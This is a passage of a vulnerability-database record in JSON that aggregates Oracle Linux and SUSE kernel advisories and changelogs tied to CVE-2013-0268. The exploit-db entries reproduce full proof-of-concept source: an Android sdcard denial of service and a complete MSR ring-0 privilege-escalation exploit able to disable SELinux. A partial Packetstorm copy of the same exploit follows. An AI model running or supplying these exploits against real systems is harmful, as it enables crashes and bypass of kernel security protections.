\r\n- xen/Makefile: fix dom-y build (Stefano Stabellini) \r\n- MAINTAINERS: add myself as Xen ARM maintainer (Stefano Stabellini) \r\n- xen/arm: compile netback (Stefano Stabellini) \r\n- xen/arm: compile blkfront and blkback (Stefano Stabellini) \r\n- xen/arm: implement alloc/free_xenballooned_pages with alloc_pages/kfree \r\n(Stefano Stabellini) \r\n- xen/arm: receive Xen events on ARM (Stefano Stabellini) \r\n- xen/arm: initialize grant_table on ARM (Stefano Stabellini) \r\n- xen/arm: get privilege status (Stefano Stabellini) \r\n- xen/arm: introduce CONFIG_XEN on ARM (Stefano Stabellini) \r\n- xen: do not compile manage, balloon, pci, acpi, pcpu and cpu_hotplug on ARM \r\n(Stefano Stabellini) \r\n- xen/tmem: cleanup (Jan Beulich) \r\n- xen: Add selfballoning memory reservation tunable. (Jana Saout) \r\n- xen: constify all instances of 'struct attribute_group' (Jan Beulich) \r\n- xen: Fix selfballooning and ensure it doesn't go too far (Dan Magenheimer) \r\n- xen: self-balloon needs module.h (Randy Dunlap) \r\n- xen/balloon: Fix compile errors - missing header files. (Konrad Rzeszutek \r\nWilk) \r\n- xen: tmem: self-ballooning and frontswap-selfshrinking (Dan Magenheimer) \r\n- xen: grant: use xen_pfn_t type for frame_list. (Ian Campbell) \r\n- xen: sysfs: fix build warning. (Ian Campbell) \r\n- xen/arm: Introduce xen_ulong_t for unsigned long (Stefano Stabellini) \r\n- xen: Introduce xen_pfn_t for pfn and mfn types (Stefano Stabellini) \r\n- xen/arm: Xen detection and shared_info page mapping (Stefano Stabellini) \r\n- docs: Xen ARM DT bindings (Stefano Stabellini) \r\n- xen/arm: empty implementation of grant_table arch specific functions (Stefano \r\nStabellini) \r\n- xen/arm: sync_bitops (Stefano Stabellini) \r\n- xen/arm: page.h definitions (Stefano Stabellini) \r\n- xen/arm: hypercalls (Stefano Stabellini) \r\n- arm: initial Xen support (Stefano Stabellini) \r\n- xen/vga: add the xen EFI video mode support (Jan Beulich) \r\n- xen: allow enable use of VGA console on dom0 (Jeremy Fitzhardinge) \r\n- xen/pcifront: Use Xen-SWIOTLB when initting if required. (Konrad Rzeszutek \r\nWilk) \r\n- xen/swiotlb: For early initialization, return zero on success. (Konrad \r\nRzeszutek Wilk) \r\n- xen/swiotlb: Use the swiotlb_late_init_with_tbl to init Xen-SWIOTLB late when \r\nPV PCI is used. (Konrad Rzeszutek Wilk) \r\n- xen/swiotlb: Move the error strings to its own function. (Konrad Rzeszutek \r\nWilk) \r\n- xen/swiotlb: Move the nr_tbl determination in its own function. (Konrad \r\nRzeszutek Wilk) \r\n- xen: Use correct masking in xen_swiotlb_alloc_coherent. (Ronny Hegewald) \r\n- xen/swiotlb: Use page alignment for early buffer allocation. (Konrad \r\nRzeszutek Wilk) \r\n- swiotlb: Expose swiotlb_nr_tlb function to modules (Konrad Rzeszutek Wilk) \r\n- xen-swiotlb: When doing coherent alloc/dealloc check before swizzling the \r\nMFNs. (Konrad Rzeszutek Wilk) \r\n- xen-swiotlb: fix printk and panic args (Randy Dunlap) \r\n- xen-swiotlb: Fix wrong panic. (Konrad Rzeszutek Wilk) \r\n- xen-swiotlb: Retry up three times to allocate Xen-SWIOTLB (Konrad Rzeszutek \r\nWilk) \r\n- swiotlb: add the late swiotlb initialization function with iotlb memory \r\n(Konrad Rzeszutek Wilk) \r\n- xen/swiotlb: With more than 4GB on 64-bit, disable the native SWIOTLB. \r\n(Konrad Rzeszutek Wilk) \r\n- xen/swiotlb: Simplify the logic. (Konrad Rzeszutek Wilk) \r\n- xen/gndev: Xen backend support for paged out grant targets V4. (Andres Lagar- \r\nCavilla) \r\n- xen/arm: compile and run xenbus (Stefano Stabellini) \r\n- xen: clear IRQ_NOAUTOEN and IRQ_NOREQUEST (Stefano Stabellini) \r\n- xen/events: fix unmask_evtchn for PV on HVM guests (Stefano Stabellini) \r\n- xen/privcmd: Correctly return success from IOCTL_PRIVCMD_MMAPBATCH (Mats \r\nPetersson) \r\n- xen/mmu: Use Xen specific TLB flush instead of the generic one. (Konrad \r\nRzeszutek Wilk) [Oracle-bug: 14630170] \r\n- xen/enlighten: Disable MWAIT_LEAF so that acpi-pad won't be loaded. (Konrad \r\nRzeszutek Wilk) \r\n- x86, amd, xen: Avoid NULL pointer paravirt references (Konrad Rzeszutek Wilk) \r\n- xen/setup: filter APERFMPERF cpuid feature out (Andre Przywara) \r\n- xen/enlighten: Expose MWAIT and MWAIT_LEAF if hypervisor OKs it. (Konrad \r\nRzeszutek Wilk) \r\n- xen/acpi: Fix potential memory leak", "edition": 72, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "ELSA-2013-2507", "href": "http://linux.oracle.com/errata/ELSA-2013-2507.html", "title": "Unbreakable Enterprise kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.6, "vector": "AV:L/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0268"], "description": "kernel-uek\n[2.6.32-300.39.5uek]\n- x86/msr: Add capabilities check (Alan Cox) [Orabug: 16481233] {CVE-2013-0268}\nofa-2.6.32-300.39.5.el6uek\nmlnx_en-2.6.32-300.39.5.el6uek\n* Mon Dec 12 2011 Guru Anbalagane \n- version 1.5.7-0.1\n* Tue Nov 01 2011 Joe Jin \n- 1.5.7 for UEK kernel.\n* Mon Sep 08 2008 Vladimir Sokolovsky \n- Added nfsrdma support\n* Wed Aug 13 2008 Vladimir Sokolovsky \n- Added mlx4_en support\n* Tue Aug 21 2007 Vladimir Sokolovsky \n- Added %build\nLANG=C\nexport LANG\nunset DISPLAY\n macro\n* Sun Jan 28 2007 Vladimir Sokolovsky \n- Created spec file for kernel-ib", "edition": 4, "modified": "2013-03-13T00:00:00", "published": "2013-03-13T00:00:00", "id": "ELSA-2013-2512", "href": "http://linux.oracle.com/errata/ELSA-2013-2512.html", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:26", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0268"], "description": "[2.6.39-400.17.2]\n- x86/msr: Add capabilities check (Alan Cox) [Orabug: 16405007] {CVE-2013-0268}", "edition": 4, "modified": "2013-03-13T00:00:00", "published": "2013-03-13T00:00:00", "id": "ELSA-2013-2511", "href": "http://linux.oracle.com/errata/ELSA-2013-2511.html", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2012-4461", "CVE-2013-0217", "CVE-2013-0231", "CVE-2012-4398", "CVE-2012-4530", "CVE-2013-0216"], "description": "[2.6.39-300.28.1]\r\n- kmod: make __request_module() killable (Oleg Nesterov) [Orabug: 16286305]\r\n {CVE-2012-4398}\r\n- kmod: introduce call_modprobe() helper (Oleg Nesterov) [Orabug: 16286305]\r\n {CVE-2012-4398}\r\n- usermodehelper: implement UMH_KILLABLE (Oleg Nesterov) [Orabug: 16286305]\r\n {CVE-2012-4398}\r\n- usermodehelper: introduce umh_complete(sub_info) (Oleg Nesterov) [Orabug:\r\n 16286305] {CVE-2012-4398}\r\n- KVM: x86: invalid opcode oops on SET_SREGS with OSXSAVE bit set\r\n (CVE-2012-4461) (Jerry Snitselaar) [Orabug: 16286290] {CVE-2012-4461}\r\n- exec: do not leave bprm->interp on stack (Kees Cook) [Orabug: 16286267]\r\n {CVE-2012-4530}\r\n- exec: use -ELOOP for max recursion depth (Kees Cook) [Orabug: 16286267]\r\n {CVE-2012-4530}\r\n \n[2.6.39-300.27.1]\r\n- xen-pciback: rate limit error messages from xen_pcibk_enable_msi{,x}() (Jan\r\n Beulich) [Orabug: 16243736] {CVE-2013-0231}\r\n- Xen: Fix stack corruption in xen_failsafe_callback for 32bit PVOPS guests.\r\n (Frediano Ziglio) [Orabug: 16274171] {CVE-2013-0190}\r\n- netback: correct netbk_tx_err to handle wrap around. (Ian Campbell) [Orabug:\r\n 16243309]\r\n- xen/netback: free already allocated memory on failure in\r\n xen_netbk_get_requests (Ian Campbell) [Orabug: 16243309]\r\n- xen/netback: don't leak pages on failure in xen_netbk_tx_check_gop. (Ian\r\n Campbell) [Orabug: 16243309]\r\n- xen/netback: shutdown the ring if it contains garbage. (Ian Campbell)\r\n [Orabug: 16243309]\r\n- ixgbevf fix typo in Makefile (Maxim Uvarov) [Orabug: 16179639 16168292]", "edition": 4, "modified": "2013-02-07T00:00:00", "published": "2013-02-07T00:00:00", "id": "ELSA-2013-2503", "href": "http://linux.oracle.com/errata/ELSA-2013-2503.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 5.2, "vector": "AV:A/AC:M/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:48", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0871", "CVE-2013-0268"], "description": "kernel\n[2.6.18-348.3.1.0.1]\n- [oprofile] x86, mm: Add __get_user_pages_fast() [orabug 14277030]\n- [oprofile] export __get_user_pages_fast() function [orabug 14277030]\n- [oprofile] oprofile, x86: Fix nmi-unsafe callgraph support [orabug 14277030]\n- [oprofile] oprofile: use KM_NMI slot for kmap_atomic [orabug 14277030]\n- [oprofile] oprofile: i386 add get_user_pages_fast support [orabug 14277030]\n- [kernel] Initialize the local uninitialized variable stats. [orabug 14051367]\n- [fs] JBD:make jbd support 512B blocks correctly for ocfs2. [orabug 13477763]\n- [x86 ] fix fpu context corrupt when preempt in signal context [orabug 14038272]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] Patch shrink_zone to yield during severe mempressure events, avoiding\n hangs and evictions (John Sobecki,Chris Mason) [orabug 6086839]\n- [mm] Enhance shrink_zone patch allow full swap utilization, and also be\n NUMA-aware (John Sobecki,Chris Mason,Herbert van den Bergh) [orabug 9245919]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n- [usb] USB: fix __must_check warnings in drivers/usb/core/ (Junxiao Bi) [orabug 14795203]\n- [usb] usbcore: fix endpoint device creation (Junxiao Bi) [orabug 14795203]\n- [usb] usbcore: fix refcount bug in endpoint removal (Junxiao Bi) [orabug 14795203]\n[2.6.18-348.3.1]\n- [utrace] ensure arch_ptrace() can never race with SIGKILL (Oleg Nesterov) [912071 912072] {CVE-2013-0871}\n- [x86] msr: Add capabilities check (Nikola Pajkovsky) [908696 908697] {CVE-2013-0268}", "edition": 5, "modified": "2013-03-11T00:00:00", "published": "2013-03-11T00:00:00", "id": "ELSA-2013-0621-1", "href": "http://linux.oracle.com/errata/ELSA-2013-0621-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0871", "CVE-2013-0268"], "description": "kernel\n[2.6.18-348.3.1]\n- [utrace] ensure arch_ptrace() can never race with SIGKILL (Oleg Nesterov) [912071 912072] {CVE-2013-0871}\n- [x86] msr: Add capabilities check (Nikola Pajkovsky) [908696 908697] {CVE-2013-0268}", "edition": 4, "modified": "2013-03-11T00:00:00", "published": "2013-03-11T00:00:00", "id": "ELSA-2013-0621", "href": "http://linux.oracle.com/errata/ELSA-2013-0621.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T20:36:11", "description": "Android Kernel 2.6 - Local DoS Crash PoC. Dos exploit for android platform", "published": "2012-12-09T00:00:00", "type": "exploitdb", "title": "Android Kernel 2.6 - Local DoS Crash PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1773"], "modified": "2012-12-09T00:00:00", "id": "EDB-ID:23248", "href": "https://www.exploit-db.com/exploits/23248/", "sourceData": "# Exploit Title: Android Kernel 2.6 Local DoS\r\n# Date: 12/7/12\r\n# Author: G13\r\n# Twitter: @g13net\r\n# Versions: Android 2.2, 2.3\r\n# Category: DoS (android)\r\n#\r\n\r\n##### Vulnerability #####\r\n\r\nThe Android OS is vulnerable to a local DoS when a filename with a\r\nlength of 2048\r\nor larger is attempted to be written to the sdcard(vfat fs) multiple times.\r\n\r\nThe result of successful running of the exploit code is the system restarting.\r\n\r\nThe vulnerability only effects Android kernels that are in the version\r\n2.6 family.\r\n\r\n##### Vendor Timeline #####\r\n\r\nThe Android Security Team has been contacted with updated PoC code and\r\ndetails.\r\n\r\nThey have been aware of this vulnerability for over a year.\r\n\r\n##### Tombstone #####\r\n\r\n*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***\r\nBuild fingerprint:\r\n'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'\r\npid: 349, tid: 363, name: SensorService >>> system_server <<<\r\nsignal 8 (SIGFPE), code -6 (?), fault addr 0000015d\r\n r0 00000000 r1 00000008 r2 00000040 r3 00000000\r\n r4 2a114310 r5 00000000 r6 51504690 r7 00000025\r\n r8 2a114330 r9 2a114350 sl 00000003 fp 00000003\r\n ip fffd4084 sp 51501eb0 lr 40039b70 pc 40037cf0 cpsr 20030010\r\n d0 4271bc7bd0b80000 d1 0000000000000000\r\n d2 0000000000000000 d3 427181eae9200000\r\n d4 0000000000000000 d5 0000000000000000\r\n d6 0000000000000000 d7 0000000000000000\r\n d8 0000000000000000 d9 0000000000000000\r\n d10 0000000000000000 d11 0000000000000000\r\n d12 0000000000000000 d13 0000000000000000\r\n d14 0000000000000000 d15 0000000000000000\r\n d16 3fe99999a0000000 d17 3fe999999999999a\r\n d18 0033003200310030 d19 0000000000000000\r\n d20 3fc554e7eb0eb47c d21 3e66376972bea4d0\r\n d22 3f4de16b9c24a98f d23 3fb0f4a31edab38b\r\n d24 3fede16b9c24a98f d25 3fe55559ee5e69f9\r\n d26 0000000000000000 d27 0000000000000000\r\n d28 0000000000000005 d29 0000000000000000\r\n d30 0000000000000000 d31 0000000000000000\r\n scr 20000010\r\n\r\nbacktrace:\r\n #00 pc 0000dcf0 /system/lib/libc.so (kill+12)\r\n #01 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #02 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #03 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #04 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #05 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #06 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #07 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #08 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #09 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #10 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #11 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #12 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #13 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #14 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #15 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n #16 pc 0000fb6c /system/lib/libc.so (__aeabi_idiv0+8)\r\n\r\n##### PoC #####\r\n\r\n#include <stdio.h>\r\n\r\nint main(int argc, char** argv) {\r\n char buf[5000];\r\n int j,k;\r\n FILE *fp;\r\n /* Path to sdcard, typically /sdcard/ */\r\n strcpy(buf,\"/sdcard/\");\r\n for(k=0;k<=2048;k++){\r\n strcat(buf,\"A\");\r\n };\r\n for(j=0;j<=50;j++){\r\n fp=fopen(buf,\"w\");\r\n };\r\nreturn 0;\r\n}\r\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23248/"}, {"lastseen": "2016-02-03T05:34:06", "description": "Linux Kernel - 'MSR' Driver Local Privilege Escalation. CVE-2013-0268. Local exploit for lin_amd64 platform", "published": "2013-08-02T00:00:00", "type": "exploitdb", "title": "Linux Kernel - 'MSR' Driver Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0268"], "modified": "2013-08-02T00:00:00", "id": "EDB-ID:27297", "href": "https://www.exploit-db.com/exploits/27297/", "sourceData": "// PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host\r\n// can do whatever in the commented area, re-enable module support, etc\r\n// requires CONFIG_X86_MSR and just uid 0\r\n// a small race exists between the time when the MSR is written to the first \r\n// time and when we issue our sysenter\r\n// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed\r\n// configured to take a hex arg of a dword pointer to set to 0\r\n// (modules_disabled, selinux_enforcing, take your pick)\r\n//\r\n// Hello to Red Hat, who has shown yet again to not care until a \r\n// public exploit is released. Not even a bugtraq entry existed in \r\n// their system until this was published -- and they have a paid team\r\n// of how many?\r\n// It's not as if I didn't mention the problem and existence of an easy \r\n// exploit multiple times prior:\r\n// https://twitter.com/grsecurity/status/298977370776432640\r\n// https://twitter.com/grsecurity/status/297365303095078912\r\n// https://twitter.com/grsecurity/status/297189488638181376\r\n// https://twitter.com/grsecurity/status/297030133628416000\r\n// https://twitter.com/grsecurity/status/297029470072745984\r\n// https://twitter.com/grsecurity/status/297028324134359041\r\n//\r\n// spender 2013\r\n\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <stdlib.h>\r\n#include <sys/time.h>\r\n#include <sys/resource.h>\r\n#include <sys/mman.h>\r\n\r\n#define SYSENTER_EIP_MSR 0x176\r\n\r\nu_int64_t msr;\r\n\r\nunsigned long ourstack[65536];\r\n\r\nu_int64_t payload_data[16];\r\n\r\nextern void *_ring0;\r\nextern void *_ring0_end;\r\n\r\nvoid ring0(void)\r\n{\r\n__asm volatile(\".globl _ring0\\n\"\r\n\t\"_ring0:\\n\"\r\n\t\".intel_syntax noprefix\\n\"\r\n\t\".code64\\n\"\r\n\t// set up stack pointer with 'ourstack'\r\n\t\"mov esp, ecx\\n\"\r\n\t// save registers, contains the original MSR value\r\n\t\"push rax\\n\"\r\n\t\"push rbx\\n\"\r\n\t\"push rcx\\n\"\r\n\t\"push rdx\\n\"\r\n\t// play with the kernel here with interrupts disabled!\r\n\t\"mov rcx, qword ptr [rbx+8]\\n\"\r\n\t\"test rcx, rcx\\n\"\r\n\t\"jz skip_write\\n\"\r\n\t\"mov dword ptr [rcx], 0\\n\"\r\n\t\"skip_write:\\n\"\r\n\t// restore MSR value before returning\r\n\t\"mov ecx, 0x176\\n\" // SYSENTER_EIP_MSR\r\n\t\"mov eax, dword ptr [rbx]\\n\"\r\n\t\"mov edx, dword ptr [rbx+4]\\n\"\r\n\t\"wrmsr\\n\"\r\n\t\"pop rdx\\n\"\r\n\t\"pop rcx\\n\"\r\n\t\"pop rbx\\n\"\r\n\t\"pop rax\\n\"\r\n\t\"sti\\n\"\r\n\t\"sysexit\\n\"\r\n\t\".code32\\n\"\r\n\t\".att_syntax prefix\\n\"\r\n \".global _ring0_end\\n\"\r\n\t\"_ring0_end:\\n\"\r\n\t);\r\n}\r\n\r\nunsigned long saved_stack;\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tcpu_set_t set;\r\n\tint msr_fd;\r\n\tint ret;\r\n\tu_int64_t new_msr;\r\n\tstruct sched_param sched;\r\n\tu_int64_t resolved_addr = 0ULL;\r\n\r\n\tif (argc == 2)\r\n\t\tresolved_addr = strtoull(argv[1], NULL, 16);\r\n\r\n\t/* can do this without privilege */\r\n\tmlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0);\r\n\tmlock(&payload_data, sizeof(payload_data));\r\n\r\n\tCPU_ZERO(&set);\r\n\tCPU_SET(0, &set);\r\n\r\n\tsched.sched_priority = 99;\r\n\r\n\tret = sched_setscheduler(0, SCHED_FIFO, &sched);\r\n\tif (ret) {\r\n\t\tfprintf(stderr, \"Unable to set priority.\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = sched_setaffinity(0, sizeof(cpu_set_t), &set);\r\n\tif (ret) {\r\n\t\tfprintf(stderr, \"Unable to set affinity.\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmsr_fd = open(\"/dev/cpu/0/msr\", O_RDWR);\r\n\tif (msr_fd < 0) {\r\n\t\tmsr_fd = open(\"/dev/msr0\", O_RDWR);\r\n\t\tif (msr_fd < 0) {\r\n\t\t\tfprintf(stderr, \"Unable to open /dev/cpu/0/msr\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\tlseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);\r\n\tret = read(msr_fd, &msr, sizeof(msr));\r\n\tif (ret != sizeof(msr)) {\r\n\t\tfprintf(stderr, \"Unable to read /dev/cpu/0/msr\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t// stuff some addresses in a buffer whose address we\r\n\t// pass to the \"kernel\" via register\r\n\tpayload_data[0] = msr;\r\n\tpayload_data[1] = resolved_addr;\r\n\r\n\tprintf(\"Old SYSENTER_EIP_MSR = %016llx\\n\", msr);\r\n\tfflush(stdout);\r\n\r\n\tlseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);\r\n\tnew_msr = (u_int64_t)(unsigned long)&_ring0;\r\n\r\n\tprintf(\"New SYSENTER_EIP_MSR = %016llx\\n\", new_msr);\r\n\tfflush(stdout);\r\n\r\n\tret = write(msr_fd, &new_msr, sizeof(new_msr));\r\n\tif (ret != sizeof(new_msr)) {\r\n\t\tfprintf(stderr, \"Unable to modify /dev/cpu/0/msr\\n\");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t__asm volatile(\r\n\t\t\".intel_syntax noprefix\\n\"\r\n\t\t\".code32\\n\"\r\n\t\t\"mov saved_stack, esp\\n\"\r\n\t\t\"lea ecx, ourstack\\n\"\r\n\t\t\"lea edx, label2\\n\"\r\n\t\t\"lea ebx, payload_data\\n\"\r\n\t\t\"sysenter\\n\"\r\n\t\t\"label2:\\n\"\r\n\t\t\"mov esp, saved_stack\\n\"\r\n\t\t\".att_syntax prefix\\n\"\r\n\t);\r\n\r\n\tprintf(\"Success.\\n\");\r\n\t\r\n\treturn 0;\r\n}\r\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/27297/"}], "suse": [{"lastseen": "2016-09-04T11:50:21", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0871", "CVE-2013-0268", "CVE-2013-0160", "CVE-2013-0231", "CVE-2012-4530", "CVE-2013-0216"], "description": "This Linux kernel update fixes various security issues and\n bugs in the SUSE Linux Enterprise 10 SP4 kernel.\n\n The following security issues have been fixed:\n\n *\n\n CVE-2013-0871: A race condition in ptrace(2) could be\n used by local attackers to crash the kernel and/or execute\n code in kernel context.\n\n *\n\n CVE-2013-0160: Avoid side channel information leaks\n from the ptys via ptmx, which allowed local attackers to\n guess keypresses.\n\n *\n\n CVE-2012-4530: Avoid leaving bprm->interp on the\n stack which might have leaked information from the kernel\n to userland attackers.\n\n *\n\n CVE-2013-0268: The msr_open function in\n arch/x86/kernel/msr.c in the Linux kernel allowed local\n users to bypass intended capability restrictions by\n executing a crafted application as root, as demonstrated by\n msr32.c.\n\n *\n\n CVE-2013-0216: The Xen netback functionality in the\n Linux kernel allowed guest OS users to cause a denial of\n service (loop) by triggering ring pointer corruption.\n\n *\n\n CVE-2013-0231: The pciback_enable_msi function in the\n PCI backend driver\n (drivers/xen/pciback/conf_space_capability_msi.c) in Xen\n for the Linux kernel allowed guest OS users with PCI device\n access to cause a denial of service via a large number of\n kernel log messages. NOTE: some of these details are\n obtained from third party information.\n\n Also the following non-security bugs have been fixed:\n\n S/390:\n\n * s390x: tty struct used after free (bnc#809692,\n LTC#90216).\n * s390x/kernel: sched_clock() overflow (bnc#799611,\n LTC#87978).\n * qeth: set new mac even if old mac is gone\n (bnc#789012,LTC#86643).\n * qeth: set new mac even if old mac is gone (2)\n (bnc#792697,LTC#87138).\n * qeth: fix deadlock between recovery and bonding\n driver (bnc#785101,LTC#85905).\n * dasd: check count address during online setting\n (bnc#781485,LTC#85346).\n * hugetlbfs: add missing TLB invalidation\n (bnc#781485,LTC#85463).\n * s390/kernel: make user-access pagetable walk code\n huge page aware (bnc#781485,LTC#85455).\n\n XEN:\n\n * xen/netback: fix netbk_count_requests().\n * xen: properly bound buffer access when parsing\n cpu/availability.\n * xen/scsiback/usbback: move cond_resched() invocations\n to proper place.\n * xen/pciback: properly clean up after calling\n pcistub_device_find().\n * xen: add further backward-compatibility configure\n options.\n * xen/PCI: suppress bogus warning on old hypervisors.\n * xenbus: fix overflow check in xenbus_dev_write().\n * xen/x86: do not corrupt %eip when returning from a\n signal handler.\n\n Other:\n\n * kernel: Restrict clearing TIF_SIGPENDING (bnc#742111).\n * kernel: recalc_sigpending_tsk fixes (bnc#742111).\n * xfs: Do not reclaim new inodes in xfs_sync_inodes()\n (bnc#770980).\n * jbd: Avoid BUG_ON when checkpoint stalls (bnc#795335).\n * reiserfs: Fix int overflow while calculating free\n space (bnc#795075).\n * cifs: clarify the meaning of tcpStatus == CifsGood\n (bnc#769093).\n * cifs: do not allow cifs_reconnect to exit with NULL\n socket pointer (bnc#769093).\n * cifs: switch to seq_files (bnc#776370).\n * scsi: fix check of PQ and PDT bits for WLUNs\n (bnc#765687).\n * hugetlb: preserve hugetlb pte dirty state\n (bnc#790236).\n * poll: enforce RLIMIT_NOFILE in poll() (bnc#787272).\n * proc: fix ->open less usage due to ->proc_fops flip\n (bnc#776370).\n * rpm/kernel-binary.spec.in: Ignore kabi errors if\n %%ignore_kabi_badness is defined. This is used in the\n Kernel:* projects in the OBS.\n", "edition": 1, "modified": "2013-04-13T01:04:40", "published": "2013-04-13T01:04:40", "id": "SUSE-SU-2013:0674-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-04/msg00018.html", "title": "Security update for Linux kernel (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:57", "description": "", "published": "2013-08-04T00:00:00", "type": "packetstorm", "title": "Linux Kernel MSR Driver Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0268"], "modified": "2013-08-04T00:00:00", "id": "PACKETSTORM:122678", "href": "https://packetstormsecurity.com/files/122678/Linux-Kernel-MSR-Driver-Privilege-Escalation.html", "sourceData": "`// PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host \n// can do whatever in the commented area, re-enable module support, etc \n// requires CONFIG_X86_MSR and just uid 0 \n// a small race exists between the time when the MSR is written to the first \n// time and when we issue our sysenter \n// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed \n// configured to take a hex arg of a dword pointer to set to 0 \n// (modules_disabled, selinux_enforcing, take your pick) \n// \n// Hello to Red Hat, who has shown yet again to not care until a \n// public exploit is released. Not even a bugtraq entry existed in \n// their system until this was published -- and they have a paid team \n// of how many? \n// It's not as if I didn't mention the problem and existence of an easy \n// exploit multiple times prior: \n// https://twitter.com/grsecurity/status/298977370776432640 \n// https://twitter.com/grsecurity/status/297365303095078912 \n// https://twitter.com/grsecurity/status/297189488638181376 \n// https://twitter.com/grsecurity/status/297030133628416000 \n// https://twitter.com/grsecurity/status/297029470072745984 \n// 